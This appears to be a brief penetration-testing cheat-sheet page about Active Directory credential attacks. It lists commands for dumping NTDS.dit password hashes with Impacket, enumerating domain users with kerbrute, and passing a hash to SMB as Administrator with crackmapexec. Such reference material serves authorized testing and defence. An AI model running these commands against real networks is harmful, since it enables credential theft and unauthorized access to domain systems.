NTDS.dit

#Impacket to dump ntds.dit hashes

Requires ntds.dit and requires Registry for SYSTEM and SECURITY hives

secretdump.py -pwd-last-set -user-status -history -ntds ntds.dit -security SECURITY -system SYSTEM local

#User kerbrute to find valid users

Kerbrute userenum --dc dc01 -d trg.loc extractedusers.txt

#pass the hash with crackmapexec

crackmapexec smb 10.0.0.1 -u Administrator -H 'Password hash'

PreviousCreate password from scavenging website.NextHydra

Last updated